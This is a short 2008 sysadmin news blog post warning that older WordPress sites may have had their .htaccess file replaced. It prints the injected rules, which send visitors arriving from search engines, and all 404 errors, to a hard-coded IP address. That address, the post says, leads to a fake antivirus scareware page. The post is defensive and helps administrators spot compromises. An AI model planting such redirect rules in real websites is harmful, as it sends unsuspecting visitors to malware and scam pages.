Recent Articles

Simple System Administration Guidelines
A system administrator's job isn't too straightforward, and there are probably hundreds, if not thousands, of tips that could be applied to all the duties. Here's a more manageable handful that will hopefully hit the...

City System Admin Locks Out Everyone
Terry Childs is cooling his jets in jail, while the city of San Francisco tries to get back control of its FiberWan network, this is why no one single person should ever have total access to anything. Dark reading...

Sys-Admin Services Lacking Social Software
Social Software technologies can improve collaboration and networking within and beyond the enterprise, but a general dearth of system and administrative...

FXCop Checks The Coding Practices Of Your Dot Net...
FXCop is one of the very few free tools you can use to check on the coding practices of a dot net assembly. If your company is building things in dot net, then this is a tool you want to run every single home grown code...


08.28.08

Beware Of Wordpress .htaccess Hack

By Brian Turner

Just quick heads up for anybody who may have any older Wordpress installs running to check their .htaccess file hasn't been hacked.

I had this happen to a major site a couple of weeks back, and a cursory look at some other sites found it occurring elsewhere.

In short, the original .htaccess file is replaced with one which redirects internal page requests to Russian "check your PC security" site, which may also threaten to install malware.

It's a nasty little hack, and this is what I found on mine:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err

Save Valuable Time and Resources with the
Peer1 ValuePro Managed Hosting Plan

The result was to send people to the following link:
http://scan.power-antivirus-2009.com/?aff=1050

Ugly, nasty, and very annoying.

Go check now if you need to.

Comments


About the Author:
I'm a SEO & business consultant in the UK, specialising in SME's and start-ups.

I run Platinax Internet as a free resource for small business trying to get the best out of being online and offer internet management services from my main company, Britecorp.

In my spare time I'm an aspiring science fiction and fantasy writer, and currently live with my family in the Highlands of Scotland.

Contact Brian
About SysAdminNews
SysAdminNews is a collection of articles, news and commentary designed to keep system administrators informed about the latest trends impacting their profession. Updates and Advice for System Administrators





SysAdminNews is brought to you by:

SecurityConfig.com NetworkingFiles.com
NetworkNewz.com WebProASP.com
SysAdminNews.com SQLProNews.com
ITcertificationNews.com SysAdminNews.com
LinuxProNews.com WirelessProNews.com
CProgrammingTrends.com ITManagementNews.com





-- SysAdminNews is an iEntry, Inc. publication --
iEntry, Inc. 2549 Richmond Rd. Lexington KY, 40509
2008 iEntry, Inc.  All Rights Reserved  Privacy Policy  Legal

archives | advertising info | news headlines | free newsletters | comments/feedback | submit article


Database Forum Updates and Advice for System Administrators SysAdminNews News Archives About Us Feedback SysAdminNews.com About Article Archive News Downloads WebProWorld Forums iEntry Advertise Contact Jayde